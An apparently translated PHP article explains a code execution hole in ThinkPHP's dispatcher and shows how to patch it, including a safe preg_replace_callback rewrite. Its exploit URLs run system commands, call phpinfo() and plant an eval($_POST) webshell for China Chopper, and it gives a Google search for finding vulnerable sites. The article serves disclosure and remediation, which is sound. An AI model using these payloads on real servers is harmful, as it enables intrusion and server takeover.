ThinkPHP is a well-known open source PHP framework, designed to simplify enterprise-level application development and agile web application development. It was first created in early 2006 under the name FCS, was officially renamed ThinkPHP on New Year's Day 2007, and is released under the Apache 2 open source license. Its early structure drew on Struts; through continuous improvement it has also borrowed from a number of excellent foreign frameworks and patterns. It uses an object-oriented development structure and the MVC pattern, integrates ideas from Struts Action and DAO, JSP's taglib (tag library), and RoR's ORM mapping and ActiveRecord pattern, encapsulates CRUD and some common operations, uses a single entry point, and stands out in its template engine, caching mechanism, authentication mechanism and extensibility.
However, an arbitrary code execution vulnerability was recently disclosed in the ThinkPHP framework. Its severity is quite high, and it is exploited as follows:
index.php/module/action/param1/${@print(THINK_VERSION)}
index.php/module/action/param1/${@function_all()}
Here function_all stands for any function, for example:
index.php/module/action/param1/${@phpinfo()}
This returns the server's system configuration information, and so on.
index.php/module/action/param1/{${system($_GET['x'])}}?x=ls -al
This lists the files of the web site.
index.php/module/action/param1/{${eval($_POST[s])}}
This directly executes a one-line ("one sentence") webshell payload, which the "kitchen knife" (China Chopper) client can then connect to.
Hackers can also search Google directly for the keywords: thinkphp intitle: System errors to get lists of more sites that use the ThinkPHP framework. Its potential for harm is clearly considerable.
Fixing the ThinkPHP arbitrary code execution vulnerability:
Users can download the officially released patch:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
or modify the source code directly:
In the file /ThinkPHP/Lib/Core/Dispatcher.class.php, the line
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
is modified to:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']=\'\\2\';', implode($depr,$paths));
That is, change the double quotation marks in the second argument of preg_replace to single quotes. With the e modifier the replacement string is evaluated as PHP code, and inside a double-quoted string PHP parses variable syntax such as ${...}; inside single quotes the captured value stays a literal string.
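The same name/value parsing can be done with no evaluation step at all. The following is an added example, not ThinkPHP's code or the official patch: it uses preg_replace_callback instead of the e modifier (deprecated in PHP 5.5 and removed in PHP 7.0), and the helper name parse_path_params and the sample input are assumptions made for illustration.

```php
<?php
// Added example (not ThinkPHP's own code): parse "name/value" path pairs
// without the e modifier, so captured text is never evaluated as PHP.

/**
 * Hypothetical helper: turns ['id', '5', 'name', 'bob'] into
 * ['id' => '5', 'name' => 'bob'] using the same pattern shape as the
 * dispatcher line shown above.
 */
function parse_path_params(array $paths, string $depr = '/'): array
{
    $var = [];
    // Escape the separator so it cannot alter the pattern itself.
    $d = preg_quote($depr, '@');

    preg_replace_callback(
        '@(\w+)' . $d . '([^' . $d . '\/]+)@',
        function (array $m) use (&$var): string {
            // Plain array assignment: $m[2] is stored as data, not code.
            $var[$m[1]] = $m[2];
            return '';
        },
        implode($depr, $paths)
    );

    return $var;
}

// Constructed sample input: one normal pair plus the probe string
// quoted in the article. Single quotes keep it a literal here too.
$paths = ['id', '5', 'param1', '${@phpinfo()}'];
$var = parse_path_params($paths);

// The normal parameter is parsed as before.
var_dump($var['id'] === '5');
// The probe arrives as an inert string; phpinfo() is never called.
var_dump($var['param1'] === '${@phpinfo()}');
```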
Note: This article is for learning and reference only; please do not use it for illegal purposes.
I hope this article helps you with PHP programming based on the ThinkPHP framework.